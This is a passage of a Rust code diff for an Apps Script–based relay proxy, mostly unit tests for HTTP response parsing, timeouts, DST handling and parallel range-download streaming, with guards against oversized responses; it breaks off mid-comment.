+            r#"{{"relay_calls":{},"relay_failures":{},"coalesced":{},"bytes_relayed":{},"cache_hits":{},"cache_misses":{},"cache_bytes":{},"blacklisted_scripts":{},"total_scripts":{},"today_calls":{},"today_bytes":{},"today_key":"{}","today_reset_secs":{},"h2_calls":{},"h2_fallbacks":{},"h2_disabled":{}}}"#,
             self.relay_calls,
             self.relay_failures,
             self.coalesced,
@@ -2074,6 +4841,9 @@ impl StatsSnapshot {
             self.today_bytes,
             esc(&self.today_key),
             self.today_reset_secs,
+            self.h2_calls,
+            self.h2_fallbacks,
+            self.h2_disabled,
         )
     }
 }
@@ -2092,6 +4862,11 @@ fn looks_like_quota_error(msg: &str) -> bool {
         || lower.contains("rate limit")
         || lower.contains("too many times")
         || lower.contains("service invoked")
+        || lower.contains("bandwidth")
+        || lower.contains("bandbreitenkontingent")
+        || lower.contains("datenübertragungsrate")
+        || lower.contains("transfer rate")
+        || lower.contains("limit exceeded")
 }
 
 fn mask_script_id(id: &str) -> String {
@@ -2210,7 +4985,191 @@ impl ServerCertVerifier for NoVerify {
 #[cfg(test)]
 mod tests {
     use super::*;
-    use tokio::io::{duplex, AsyncWriteExt};
+    use std::pin::Pin;
+    use std::task::{Context, Poll};
+    use tokio::io::{duplex, AsyncRead, AsyncWriteExt, ReadBuf};
+
+    // Test fixture for ungraceful TLS close: emit a fixed prefix of bytes
+    // then return io::ErrorKind::UnexpectedEof on the next read. Mirrors
+    // what rustls surfaces when the peer closes TCP without sending a
+    // TLS close_notify alert (#585).
+    struct UnexpectedEofAfter {
+        bytes: Vec<u8>,
+        position: usize,
+    }
+
+    impl AsyncRead for UnexpectedEofAfter {
+        fn poll_read(
+            mut self: Pin<&mut Self>,
+            _cx: &mut Context<'_>,
+            buf: &mut ReadBuf<'_>,
+        ) -> Poll<std::io::Result<()>> {
+            if self.position >= self.bytes.len() {
+                return Poll::Ready(Err(std::io::Error::new(
+                    std::io::ErrorKind::UnexpectedEof,
+                    "peer closed connection without sending TLS close_notify",
+                )));
+            }
+            let remaining = &self.bytes[self.position..];
+            let take = remaining.len().min(buf.remaining());
+            buf.put_slice(&remaining[..take]);
+            self.position += take;
+            Poll::Ready(Ok(()))
+        }
+    }
+
+    #[tokio::test]
+    async fn read_http_response_tolerates_unexpected_eof_with_content_length() {
+        // Issue #585 / v1.9.4 exit-node bug. Some peers (the deployed exit-node in
+        // particular, certain Apps Script `Connection: close` paths) close
+        // the TCP without TLS close_notify. Body should still be returned
+        // when Content-Length is satisfied, even though the read after
+        // the body closes ungracefully.
+        let body = b"{\"ok\":true}";
+        let header = format!(
+            "HTTP/1.1 200 OK\r\nContent-Length: {}\r\nConnection: close\r\n\r\n",
+            body.len()
+        );
+        let mut full = header.into_bytes();
+        full.extend_from_slice(body);
+        let mut stream = UnexpectedEofAfter {
+            bytes: full,
+            position: 0,
+        };
+
+        let (status, _headers, got_body) =
+            read_http_response(&mut stream).await.expect("must succeed despite UnexpectedEof");
+        assert_eq!(status, 200);
+        assert_eq!(got_body, body);
+    }
+
+    #[tokio::test]
+    async fn read_http_response_tolerates_unexpected_eof_no_framing() {
+        // Same #585 fix, but for the no-framing branch (server didn't
+        // send Content-Length or Transfer-Encoding). Read until peer
+        // closes — UnexpectedEof should terminate the loop with the
+        // body we accumulated so far, not bubble up as an error.
+        let header = b"HTTP/1.1 200 OK\r\nConnection: close\r\n\r\n";
+        let body = b"hello world";
+        let mut full = header.to_vec();
+        full.extend_from_slice(body);
+        let mut stream = UnexpectedEofAfter {
+            bytes: full,
+            position: 0,
+        };
+
+        let (status, _headers, got_body) =
+            read_http_response(&mut stream).await.expect("must succeed despite UnexpectedEof");
+        assert_eq!(status, 200);
+        assert_eq!(got_body, body);
+    }
+
+    /// Issue #1088. The tunnel batch path passes `batch_timeout` (default
+    /// 30 s, configurable up to 300 s) to `read_http_response_with_header_timeout`
+    /// so Apps Script cold starts in the 8-12 s range no longer trip a
+    /// hardcoded 10 s cliff. A regression that re-introduces the old 10 s
+    /// inner timeout — or that ignores the parameter entirely — would let
+    /// cold-start batches fail in the field while passing every existing
+    /// test. This locks the parameter down: headers arriving at virtual
+    /// T=15 s must succeed when the caller asked for a 30 s budget.
+    #[tokio::test(start_paused = true)]
+    async fn read_http_response_respects_configured_header_timeout() {
+        use tokio::io::AsyncWriteExt;
+
+        let (mut client_side, mut server_side) = tokio::io::duplex(8192);
+        let response = b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n";
+
+        tokio::spawn(async move {
+            // Slow Apps Script edge: response doesn't start streaming
+            // for 15 s. Under a 10 s budget this would be Timeout; under
+            // the 30 s budget the caller passed it must succeed.
+            tokio::time::sleep(Duration::from_secs(15)).await;
+            server_side.write_all(response).await.unwrap();
+        });
+
+        let (status, _, body) = read_http_response_with_header_timeout(
+            &mut client_side,
+            Duration::from_secs(30),
+        )
+        .await
+        .expect("15 s response must succeed under 30 s header-read budget");
+        assert_eq!(status, 200);
+        assert!(body.is_empty());
+    }
+
+    /// The header-read deadline must be *total*, not reset on every read.
+    /// Without this, a peer that drip-feeds one byte just under the
+    /// per-read timeout keeps the loop alive forever and defeats the
+    /// outer `batch_timeout` wiring — defeating the whole point of
+    /// #1088's fix. This is the regression that would survive a naive
+    /// revert to `timeout(d, stream.read(...))` inside the loop, because
+    /// every individual read completes well under `d`. With the
+    /// `timeout_at(deadline, ...)` form, total elapsed exceeds the
+    /// deadline and we get `FronterError::Timeout`.
+    #[tokio::test(start_paused = true)]
+    async fn read_http_response_header_deadline_is_total_not_per_read() {
+        use tokio::io::AsyncWriteExt;
+
+        let (mut client_side, mut server_side) = tokio::io::duplex(8192);
+        // Header block is 38 bytes; drip-feeding at 3 s/byte takes 114 s
+        // total. Each individual read returns within 3 s — well under
+        // the 10 s budget — so per-read semantics would NOT detect the
+        // stall.
+        let response = b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n".to_vec();
+
+        tokio::spawn(async move {
+            for byte in response {
+                tokio::time::sleep(Duration::from_secs(3)).await;
+                server_side.write_all(&[byte]).await.unwrap();
+                server_side.flush().await.unwrap();
+            }
+        });
+
+        let result = read_http_response_with_header_timeout(
+            &mut client_side,
+            Duration::from_secs(10),
+        )
+        .await;
+        assert!(
+            matches!(result, Err(FronterError::Timeout)),
+            "drip-feed slower than the total deadline must time out — \
+             got {:?}",
+            result.map(|(s, _, _)| s)
+        );
+    }
+
+    #[tokio::test]
+    async fn parse_exit_node_response_unwraps_exit_node_envelope() {
+        // The exit-node path through Apps Script returns exit node's JSON
+        // envelope as the response body. parse_exit_node_response must
+        // unwrap it back into a raw HTTP/1.1 response so the MITM TLS
+        // write-back path sees the same shape it gets from the regular
+        // Apps Script relay.
+        let envelope = br#"{"s":200,"h":{"content-type":"application/json","x-cf-cache":"DYNAMIC"},"b":"eyJtZXNzYWdlIjoiaGVsbG8ifQ=="}"#;
+        let raw = parse_exit_node_response(envelope).expect("envelope unwrap should succeed");
+        let raw_str = String::from_utf8_lossy(&raw);
+        assert!(raw_str.starts_with("HTTP/1.1 200 OK\r\n"));
+        assert!(raw_str.contains("content-type: application/json\r\n"));
+        assert!(raw_str.contains("x-cf-cache: DYNAMIC\r\n"));
+        assert!(raw_str.contains("Content-Length: 19\r\n"));
+        // Body is `{"message":"hello"}` (19 bytes; the base64-decoded
+        // contents of the b field).
+        assert!(raw.ends_with(b"{\"message\":\"hello\"}"));
+    }
+
+    #[tokio::test]
+    async fn parse_exit_node_response_surfaces_explicit_error() {
+        // When the exit node returns `{e: "..."}` instead of the {s,h,b} shape,
+        // surface that error message specifically rather than letting
+        // it through as an unparseable 502 — the message string is what
+        // tells the user what went wrong (placeholder PSK, bad URL,
+        // unauthorized, etc.).
+        let envelope = br#"{"e":"unauthorized"}"#;
+        let err = parse_exit_node_response(envelope).expect_err("must surface error");
+        let msg = format!("{}", err);
+        assert!(msg.contains("unauthorized"), "got: {}", msg);
+        assert!(msg.contains("exit node"), "got: {}", msg);
+    }
 
     #[test]
     fn unix_to_ymd_utc_handles_known_epochs() {
@@ -2227,12 +5186,47 @@ mod tests {
     }
 
     #[test]
-    fn seconds_until_utc_midnight_is_bounded() {
-        let n = seconds_until_utc_midnight();
+    fn seconds_until_pacific_midnight_is_bounded() {
+        let n = seconds_until_pacific_midnight();
         // Must be in (0, 86400] for any valid system clock.
         assert!(n > 0 && n <= 86_400);
     }
 
+    #[test]
+    fn nth_sunday_of_month_anchors() {
+        // Spot-check Sakamoto's day-of-week + offset arithmetic against
+        // a few known Sundays. Mistakes here would silently shift the
+        // DST transition by ±1 week.
+        // March 2026: 2nd Sunday is March 8 (Sun Mar 1, Sun Mar 8).
+        assert_eq!(nth_sunday_of_month(2026, 3, 2), 8);
+        // November 2026: 1st Sunday is November 1 (Sun Nov 1).
+        assert_eq!(nth_sunday_of_month(2026, 11, 1), 1);
+        // March 2024: 2nd Sunday is March 10 (Sun Mar 3, Sun Mar 10).
+        assert_eq!(nth_sunday_of_month(2024, 3, 2), 10);
+        // November 2024: 1st Sunday is November 3.
+        assert_eq!(nth_sunday_of_month(2024, 11, 1), 3);
+        // March 2027: 2nd Sunday is March 14.
+        assert_eq!(nth_sunday_of_month(2027, 3, 2), 14);
+    }
+
+    #[test]
+    fn pacific_dst_window_anchors() {
+        // Outside the DST window: PST.
+        assert!(!pacific_is_dst(2026, 1, 15));
+        assert!(!pacific_is_dst(2026, 12, 25));
+        assert!(!pacific_is_dst(2026, 2, 28));
+        assert!(!pacific_is_dst(2026, 11, 5)); // first Sun of Nov 2026 = Nov 1; Nov 5 is past
+        // Inside: PDT.
+        assert!(pacific_is_dst(2026, 6, 1));
+        assert!(pacific_is_dst(2026, 9, 30));
+        // Boundary: March 8, 2026 (DST start day) and after = PDT.
+        assert!(!pacific_is_dst(2026, 3, 7));
+        assert!(pacific_is_dst(2026, 3, 8));
+        // Boundary: Oct 31 = PDT, Nov 1 = first Sunday = PST flips on.
+        assert!(pacific_is_dst(2026, 10, 31));
+        assert!(!pacific_is_dst(2026, 11, 1));
+    }
+
     #[test]
     fn filter_forwarded_headers_strips_identity_revealing_headers() {
         // Issue #104: any proxy/extension that inserts these must not
@@ -2429,34 +5423,878 @@ mod tests {
     }
 
     #[test]
-    fn validate_probe_range_rejects_body_length_mismatch() {
-        let headers = vec![("Content-Range".to_string(), "bytes 0-4/20".to_string())];
-        assert!(validate_probe_range(206, &headers, b"hey", 4).is_none());
-    }
+    fn validate_probe_range_accepts_decoded_full_entity_body_mismatch() {
+        let mut raw = b"HTTP/1.1 206 Partial Content\r\n\
+Content-Range: bytes 0-11247/11248\r\n\
+Content-Type: text/javascript\r\n\
+Vary: Accept-Encoding\r\n\
+Content-Length: 45812\r\n\r\n"
+            .to_vec();
+        raw.extend(std::iter::repeat(b'x').take(45_812));
+
+        let (status, headers, body) = split_response(&raw).unwrap();
+        assert_eq!(
+            validate_probe_range(status, &headers, body, RANGE_PARALLEL_CHUNK_BYTES - 1),
+            Some(ContentRange {
+                start: 0,
+                end: 11_247,
+                total: 11_248,
+            }),
+        );
 
-    #[test]
-    fn stitched_range_capacity_rejects_absurd_total() {
+        let rewritten = rewrite_206_to_200(&raw);
+        let (status, headers, body) = split_response(&rewritten).unwrap();
+        assert_eq!(status, 200);
+        assert_eq!(body.len(), 45_812);
+        assert!(!headers
+            .iter()
+            .any(|(k, _)| k.eq_ignore_ascii_case("content-range")));
         assert_eq!(
-            checked_stitched_range_capacity(MAX_STITCHED_RANGE_BYTES),
-            Some(MAX_STITCHED_RANGE_BYTES as usize),
+            headers
+                .iter()
+                .find(|(k, _)| k.eq_ignore_ascii_case("content-length"))
+                .map(|(_, v)| v.as_str()),
+            Some("45812"),
         );
-        assert_eq!(checked_stitched_range_capacity(MAX_STITCHED_RANGE_BYTES + 1), None);
-        assert_eq!(checked_stitched_range_capacity(u64::MAX), None);
     }
 
     #[test]
-    fn extract_exact_range_body_rejects_mismatched_content_range() {
-        let raw = b"HTTP/1.1 206 Partial Content\r\n\
-Content-Range: bytes 5-9/20\r\n\
-Content-Length: 5\r\n\r\n\
-hello";
-        let err = extract_exact_range_body(raw, 10, 14, 20).unwrap_err();
-        assert_eq!(err, "unexpected Content-Range");
+    fn validate_probe_range_rejects_missing_content_range() {
+        assert!(validate_probe_range(206, &[], b"hello", 4).is_none());
     }
 
     #[test]
-    fn parse_relay_error_field() {
-        let body = r#"{"e":"unauthorized"}"#;
+    fn validate_probe_range_rejects_nonzero_start() {
+        let headers = vec![("Content-Range".to_string(), "bytes 1-4/20".to_string())];
+        assert!(validate_probe_range(206, &headers, b"hell", 4).is_none());
+    }
+
+    #[test]
+    fn validate_probe_range_rejects_end_past_requested_end() {
+        let headers = vec![("Content-Range".to_string(), "bytes 0-5/20".to_string())];
+        assert!(validate_probe_range(206, &headers, b"hello!", 4).is_none());
+    }
+
+    #[test]
+    fn validate_probe_range_rejects_body_length_mismatch() {
+        let headers = vec![("Content-Range".to_string(), "bytes 0-4/20".to_string())];
+        assert!(validate_probe_range(206, &headers, b"hey", 4).is_none());
+    }
+
+    #[test]
+    fn extract_exact_range_body_rejects_body_length_mismatch() {
+        let raw = b"HTTP/1.1 206 Partial Content\r\n\
+Content-Range: bytes 5-9/20\r\n\
+Content-Length: 3\r\n\r\n\
+hey";
+        let err = extract_exact_range_body(raw, 5, 9, 20).unwrap_err();
+        assert_eq!(err, "Content-Range/body length mismatch");
+    }
+
+    #[test]
+    fn extract_exact_range_body_rejects_mismatched_content_range() {
+        let raw = b"HTTP/1.1 206 Partial Content\r\n\
+Content-Range: bytes 5-9/20\r\n\
+Content-Length: 5\r\n\r\n\
+hello";
+        let err = extract_exact_range_body(raw, 10, 14, 20).unwrap_err();
+        assert_eq!(err, "unexpected Content-Range");
+    }
+
+    #[test]
+    fn assemble_200_head_uses_declared_length_and_strips_range_meta() {
+        // Streaming path passes `total` (full file size) as the declared
+        // length even though the body hasn't been assembled yet. The head
+        // block must carry that as Content-Length and must NOT carry the
+        // probe's Content-Range (would mark response as partial and
+        // clients would reject mid-stream chunks past the probe's end).
+        let probe_headers = vec![
+            ("Content-Type".to_string(), "application/octet-stream".to_string()),
+            ("Content-Range".to_string(), "bytes 0-262143/109605203".to_string()),
+            ("Content-Length".to_string(), "262144".to_string()),
+            ("Content-Encoding".to_string(), "gzip".to_string()),
+            ("Transfer-Encoding".to_string(), "chunked".to_string()),
+            ("Connection".to_string(), "close".to_string()),
+            ("Cache-Control".to_string(), "max-age=300".to_string()),
+        ];
+        let head = assemble_200_head(&probe_headers, 109_605_203);
+        let s = std::str::from_utf8(&head).unwrap();
+        assert!(s.starts_with("HTTP/1.1 200 OK\r\n"));
+        assert!(s.ends_with("\r\n\r\n"));
+        assert!(s.contains("Content-Length: 109605203\r\n"));
+        // Hop-by-hop and content-meta the buffered path strips must
+        // ALSO be stripped by the streaming head (else range responses
+        // would mislead clients).
+        assert!(!s.contains("Content-Range:"));
+        assert!(!s.contains("Content-Encoding:"));
+        assert!(!s.contains("Transfer-Encoding:"));
+        assert!(!s.contains("Connection:"));
+        // Original Content-Length from the probe must NOT survive —
+        // we computed our own from `total`.
+        assert!(!s.contains("Content-Length: 262144\r\n"));
+        // Non-stripped headers pass through.
+        assert!(s.contains("Content-Type: application/octet-stream\r\n"));
+        assert!(s.contains("Cache-Control: max-age=300\r\n"));
+    }
+
+    #[test]
+    fn assemble_200_head_matches_full_200_head_for_buffered_path() {
+        // The two assemblers must agree on header semantics so a
+        // response taken via the buffered path is byte-identical (in
+        // its head block) to the same response taken via the streaming
+        // path. Lock that in here so future header-skip changes don't
+        // drift between the two.
+        let headers = vec![
+            ("Content-Type".to_string(), "text/html".to_string()),
+            ("Content-Range".to_string(), "bytes 0-9/10".to_string()),
+            ("X-Custom".to_string(), "foo".to_string()),
+        ];
+        let body = b"helloworld";
+        let full = assemble_full_200(&headers, body);
+        let head_only = assemble_200_head(&headers, body.len() as u64);
+        let sep = b"\r\n\r\n";
+        let idx = full.windows(sep.len()).position(|w| w == sep).unwrap();
+        assert_eq!(&full[..idx + sep.len()], head_only.as_slice());
+    }
+
+    #[tokio::test]
+    async fn write_response_with_head_transform_applies_to_head_not_body() {
+        // The bridge between writer-based API and the buffered/error
+        // paths: head gets the transform; body bytes are forwarded
+        // unchanged so binary payloads aren't corrupted by an
+        // accidental UTF-8 round-trip in the transform path.
+        let response = b"HTTP/1.1 200 OK\r\nContent-Type: app/octet-stream\r\nContent-Length: 4\r\n\r\n\x00\x01\x02\xff";
+        let mut buf: Vec<u8> = Vec::new();
+        let transform = |head: &[u8]| -> Vec<u8> {
+            // Tag the head so we can prove the transform ran on it.
+            // Strip the trailing CRLFCRLF terminator, append a new
+            // header line, then restore the terminator.
+            let sep = b"\r\n\r\n";
+            let mut out = head.strip_suffix(sep).unwrap_or(head).to_vec();
+            out.extend_from_slice(b"\r\nX-Tag: yes\r\n\r\n");
+            out
+        };
+        write_response_with_head_transform(&mut buf, response, &transform)
+            .await
+            .unwrap();
+        let sep_pos = buf.windows(4).position(|w| w == b"\r\n\r\n").unwrap();
+        let (head, body) = (&buf[..sep_pos + 4], &buf[sep_pos + 4..]);
+        let head_s = std::str::from_utf8(head).unwrap();
+        assert!(head_s.contains("X-Tag: yes\r\n"));
+        // Body is byte-identical — no UTF-8 lossy conversion.
+        assert_eq!(body, b"\x00\x01\x02\xff");
+    }
+
+    #[tokio::test]
+    async fn write_response_with_head_transform_passes_through_when_no_terminator() {
+        // Defensive: a payload missing `\r\n\r\n` (corrupted upstream,
+        // raw error blob) must be forwarded byte-identical so we don't
+        // synthesise a fake header for non-HTTP/1.x bytes.
+        let response = b"not an http response";
+        let mut buf: Vec<u8> = Vec::new();
+        let transform = |_: &[u8]| -> Vec<u8> { b"XX".to_vec() };
+        write_response_with_head_transform(&mut buf, response, &transform)
+            .await
+            .unwrap();
+        assert_eq!(buf.as_slice(), response);
+    }
+
+    #[test]
+    fn plan_remaining_ranges_basic_chunking() {
+        // probe covered 0..=3 of a 20-byte file at 5-byte chunks →
+        // remaining ranges are 4-8, 9-13, 14-18, 19-19.
+        let ranges: Vec<_> = plan_remaining_ranges(3, 20, 5).collect();
+        assert_eq!(ranges, vec![(4, 8), (9, 13), (14, 18), (19, 19)]);
+    }
+
+    #[test]
+    fn plan_remaining_ranges_yields_nothing_when_probe_covers_everything() {
+        // Defensive: even though the caller is supposed to short-circuit
+        // when the probe covers the entity, the iterator itself must be
+        // a no-op rather than emit a bogus 0-length range.
+        let ranges: Vec<_> = plan_remaining_ranges(19, 20, 5).collect();
+        assert!(ranges.is_empty());
+    }
+
+    #[test]
+    fn plan_remaining_ranges_handles_huge_total_lazily_without_oom() {
+        // Regression for the DoS introduced when the buffered+streaming
+        // refactor (1.9.23) initially built the full ranges Vec before
+        // branching on size. A hostile origin advertising
+        // `Content-Range: bytes 0-262143/<huge>` can pass the probe
+        // checks (matching 256 KiB body, valid total) and used to drive
+        // ~6 GB of `Vec<(u64, u64)>` allocation for a 100 TiB total.
+        //
+        // Lazy iteration must let us pull a bounded number of items
+        // from a u64::MAX-sized total without panicking or allocating
+        // the whole plan. Pulling 10 items proves we never materialised
+        // ~2^44 of them up front.
+        let total = u64::MAX;
+        let chunk = 256 * 1024;
+        let probe_end = chunk - 1;
+        let first_ten: Vec<_> = plan_remaining_ranges(probe_end, total, chunk).take(10).collect();
+        assert_eq!(first_ten.len(), 10);
+        // First range starts right after the probe.
+        assert_eq!(first_ten[0].0, probe_end + 1);
+        // Each range covers exactly one chunk except possibly the last
+        // — which here can't be the tail because we only took 10.
+        for (s, e) in &first_ten {
+            assert_eq!(e - s + 1, chunk);
+        }
+        // Successive ranges are contiguous.
+        for w in first_ten.windows(2) {
+            assert_eq!(w[1].0, w[0].1 + 1);
+        }
+    }
+
+    #[tokio::test]
+    async fn stream_chunks_to_writer_writes_head_probe_then_chunks_in_order() {
+        // Happy path: streaming writer must emit
+        //   head + probe_body + chunk1_body + chunk2_body + …
+        // in input order so a download client reading byte 0 onward
+        // sees a coherent response.
+        use futures_util::stream::{self, StreamExt as _};
+        let head = b"HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n";
+        let probe = b"AB";
+        // The streaming function consumes whatever `Stream` it's given;
+        // tests feed it `stream::iter` of synthetic chunk results so
+        // we exercise the writer + ordering logic without needing a
+        // live DomainFronter / Apps Script.
+        let fetches = stream::iter(vec![
+            (2u64, 5u64, Ok::<Vec<u8>, &'static str>(b"CDEF".to_vec())),
+            (6u64, 9u64, Ok::<Vec<u8>, &'static str>(b"GHIJ".to_vec())),
+        ]);
+        let mut buf = Vec::new();
+        stream_chunks_to_writer(
+            &mut VecAsyncWriter(&mut buf),
+            head,
+            probe,
+            10,
+            fetches.map(|x| x),
+            "https://example.test/file",
+        )
+        .await
+        .unwrap();
+        // Whole wire output: head, then probe body, then chunks in
+        // input order — no chunk reordered to "fastest first."
+        let expected: Vec<u8> = [head.as_slice(), probe.as_slice(), b"CDEF", b"GHIJ"].concat();
+        assert_eq!(buf, expected);
+    }
+
+    #[test]
+    fn dispatch_range_response_wrapper_buffers_through_64mib_ceiling() {
+        // Pre-1.9.23 behavior preservation: `relay_parallel_range ->
+        // Vec<u8>` used to stitch range-capable responses up to the
+        // old `MAX_STITCHED_RANGE_BYTES` cap of 64 MiB. The first
+        // round of this PR collapsed that cap into the new 40 MiB
+        // streaming threshold, regressing 40-64 MiB downloads
+        // through the wrapper (Apps Script's single-GET path returns
+        // 502/504 above ~40 MiB). Restored via separate constants:
+        // wrapper stays buffered up to BUFFERED_STITCH_MAX_BYTES,
+        // not APPS_SCRIPT_BODY_MAX_BYTES.
+        assert_eq!(
+            dispatch_range_response(40 * 1024 * 1024, false),
+            RangeDispatch::Buffered,
+        );
+        assert_eq!(
+            dispatch_range_response(50 * 1024 * 1024, false),
+            RangeDispatch::Buffered,
+        );
+        assert_eq!(
+            dispatch_range_response(BUFFERED_STITCH_MAX_BYTES, false),
+            RangeDispatch::Buffered,
+        );
+    }
+
+    #[test]
+    fn dispatch_range_response_wrapper_falls_back_above_buffered_cap() {
+        // Lock-in for the Vec<u8> wrapper contract (Issue #162):
+        // above the buffered ceiling the wrapper MUST NOT take the
+        // streaming branch (which would emit a partial 200 OK that
+        // a `Vec<u8>` consumer can't react to). Above the buffered
+        // cap, fall back to single GET — same path the pre-1.9.23
+        // wrapper took above its 64 MiB cliff.
+        assert_eq!(
+            dispatch_range_response(BUFFERED_STITCH_MAX_BYTES + 1, false),
+            RangeDispatch::FallbackSingleGet,
+        );
+        assert_eq!(
+            dispatch_range_response(100 * 1024 * 1024, false),
+            RangeDispatch::FallbackSingleGet,
+        );
+        assert_eq!(
+            dispatch_range_response(u64::MAX, false),
+            RangeDispatch::FallbackSingleGet,
+        );
+    }
+
+    #[test]
+    fn dispatch_range_response_writer_api_streams_above_apps_script_ceiling() {
+        // Writer-based API contract: streams above the Apps Script
+        // single-GET ceiling so large downloads (>40 MiB) actually
+        // deliver. Without this, we'd be back to the pre-fix 504
+        // timeout for the 104 MiB DMG that motivated #1042. The
+        // writer API streams in the 40-64 MiB band too (where the
+        // wrapper would still buffer): that's intentional — on
+        // chunk failure, streaming truncates and the download client
+        // resumes via Range, while the buffered path's fallback
+        // can't recover at this size anyway.
+        //
+        // Upper bound is the streaming cap MAX_STREAMED_RANGE_BYTES
+        // (quota-DoS guard); above it, see
+        // `dispatch_range_response_rejects_streamed_totals_above_streaming_cap`.
+        assert_eq!(
+            dispatch_range_response(APPS_SCRIPT_BODY_MAX_BYTES + 1, true),
+            RangeDispatch::Stream,
+        );
+        assert_eq!(
+            dispatch_range_response(50 * 1024 * 1024, true),
+            RangeDispatch::Stream,
+        );
+        assert_eq!(
+            dispatch_range_response(BUFFERED_STITCH_MAX_BYTES + 1, true),
+            RangeDispatch::Stream,
+        );
+        // Just under the streaming cap still streams.
+        assert_eq!(
+            dispatch_range_response(MAX_STREAMED_RANGE_BYTES, true),
+            RangeDispatch::Stream,
+        );
+    }
+
+    #[test]
+    fn dispatch_range_response_rejects_streamed_totals_above_streaming_cap() {
+        // Quota-DoS guard for the writer API: a hostile origin can
+        // advertise an absurd Content-Range total (e.g. u64::MAX) and
+        // pass the probe checks with a normal-sized first-chunk body,
+        // making us issue chunk Apps Script calls until the client
+        // disconnects. Each call counts toward the daily quota
+        // (~20 k requests/day free tier), so an unattended hostile
+        // download would lock the user out of the relay. Refuse
+        // anything above MAX_STREAMED_RANGE_BYTES instead of
+        // streaming.
+        assert_eq!(
+            dispatch_range_response(MAX_STREAMED_RANGE_BYTES + 1, true),
+            RangeDispatch::RejectTooLarge,
+        );
+        assert_eq!(
+            dispatch_range_response(u64::MAX, true),
+            RangeDispatch::RejectTooLarge,
+        );
+        // At the cap, streaming is still allowed. The boundary is
+        // strict greater-than so the constant itself is reachable.
+        assert_eq!(
+            dispatch_range_response(MAX_STREAMED_RANGE_BYTES, true),
+            RangeDispatch::Stream,
+        );
+        // Wrapper (streaming_allowed=false) hits its own
+        // BUFFERED_STITCH_MAX_BYTES cliff far below MAX_STREAMED_…,
+        // so any oversized total routes to FallbackSingleGet (Apps
+        // Script's single-GET will reject it naturally), not to
+        // RejectTooLarge.
+        assert_eq!(
+            dispatch_range_response(MAX_STREAMED_RANGE_BYTES + 1, false),
+            RangeDispatch::FallbackSingleGet,
+        );
+        assert_eq!(
+            dispatch_range_response(u64::MAX, false),
+            RangeDispatch::FallbackSingleGet,
+        );
+    }
+
+    #[test]
+    fn dispatch_range_response_at_or_below_apps_script_ceiling_stays_buffered() {
+        // At or below the Apps Script ceiling, both API surfaces stay
+        // buffered — the buffered path has a real recovery story (a
+        // chunk failure falls back to single GET, which delivers a
+        // complete file when ≤ 40 MiB).
+        for streaming_allowed in [true, false] {
+            assert_eq!(
+                dispatch_range_response(APPS_SCRIPT_BODY_MAX_BYTES, streaming_allowed),
+                RangeDispatch::Buffered,
+            );
+            assert_eq!(
+                dispatch_range_response(1024 * 1024, streaming_allowed),
+                RangeDispatch::Buffered,
+            );
+            assert_eq!(
+                dispatch_range_response(1, streaming_allowed),
+                RangeDispatch::Buffered,
+            );
+            assert_eq!(
+                dispatch_range_response(0, streaming_allowed),
+                RangeDispatch::Buffered,
+            );
+        }
+    }
+
+    /// Test-only `AsyncWrite` that records the byte-offset of every
+    /// `poll_flush` call. Used to verify
+    /// `stream_chunks_to_writer` flushes the committed prefix before
+    /// surfacing a chunk-validation error — critical for TLS streams
+    /// where the partial body sits in the TLS writer's in-memory
+    /// buffer and would otherwise be dropped on connection close.
+    struct FlushTrackingWriter {
+        buf: Vec<u8>,
+        /// Byte offset (relative to `buf.len()` at the time) of each
+        /// `poll_flush` call. Lets a test assert "flush happened
+        /// after byte N had been written."
+        flushed_at: Vec<usize>,
+    }
+
+    impl FlushTrackingWriter {
+        fn new() -> Self {
+            Self { buf: Vec::new(), flushed_at: Vec::new() }
+        }
+    }
+
+    impl tokio::io::AsyncWrite for FlushTrackingWriter {
+        fn poll_write(
+            self: std::pin::Pin<&mut Self>,
+            _: &mut std::task::Context<'_>,
+            buf: &[u8],
+        ) -> std::task::Poll<std::io::Result<usize>> {
+            self.get_mut().buf.extend_from_slice(buf);
+            std::task::Poll::Ready(Ok(buf.len()))
+        }
+        fn poll_flush(
+            self: std::pin::Pin<&mut Self>,
+            _: &mut std::task::Context<'_>,
+        ) -> std::task::Poll<std::io::Result<()>> {
+            let me = self.get_mut();
+            let at = me.buf.len();
+            me.flushed_at.push(at);
+            std::task::Poll::Ready(Ok(()))
+        }
+        fn poll_shutdown(
+            self: std::pin::Pin<&mut Self>,
+            _: &mut std::task::Context<'_>,
+        ) -> std::task::Poll<std::io::Result<()>> {
+            std::task::Poll::Ready(Ok(()))
+        }
+    }
+
+    #[tokio::test]
+    async fn stream_chunks_to_writer_flushes_before_returning_chunk_error() {
+        // TLS-safety lock-in: chunk-validation failure surfaces as
+        // `Err`, and the caller (proxy_server.rs) typically uses `?`
+        // to propagate — which means the post-error `stream.flush()`
+        // in the caller never runs. Without the in-function flush,
+        // bytes buffered inside the TLS writer get dropped when the
+        // connection closes, and the download client sees a clean
+        // empty body instead of the partial prefix it needs to
+        // resume via Range. This test asserts flush() is called
+        // after the committed prefix bytes have been written and
+        // before the function returns.
+        use futures_util::stream::{self, StreamExt as _};
+        let head = b"HTTP/1.1 200 OK\r\nContent-Length: 12\r\n\r\n";
+        let probe = b"AB";
+        let fetches = stream::iter(vec![
+            (2u64, 5u64, Ok::<Vec<u8>, &'static str>(b"CDEF".to_vec())),
+            (6u64, 9u64, Err::<Vec<u8>, &'static str>("validation failure")),
+        ]);
+        let mut writer = FlushTrackingWriter::new();
+        let result = stream_chunks_to_writer(
+            &mut writer,
+            head,
+            probe,
+            12,
+            fetches.map(|x| x),
+            "https://example.test/file",
+        )
+        .await;
+        assert!(result.is_err());
+
+        // Bytes written before the failure: head + probe + first
+        // chunk = head_len + 2 + 4.
+        let expected_committed = head.len() + 2 + 4;
+        assert_eq!(writer.buf.len(), expected_committed);
+
+        // Flush must have been called after the committed prefix
+        // was in place — i.e., at the same byte count as `buf.len()`.
+        assert!(
+            writer.flushed_at.iter().any(|&at| at == expected_committed),
+            "flush() must run after committed prefix is written; flushed_at={:?}, expected at byte {}",
+            writer.flushed_at,
+            expected_committed,
+        );
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn stream_chunks_to_writer_emits_progress_log_at_each_16mib_boundary() {
+        // User feedback on PR #1085: large streamed downloads went
+        // silent in the logs between "starting N chunks" and
+        // completion, with no progress signal. This test locks in
+        // the periodic progress lines by capturing the tracing
+        // output of a synthetic 40 MiB stream and counting how many
+        // `range-parallel-stream:` lines mention "MiB" (the progress
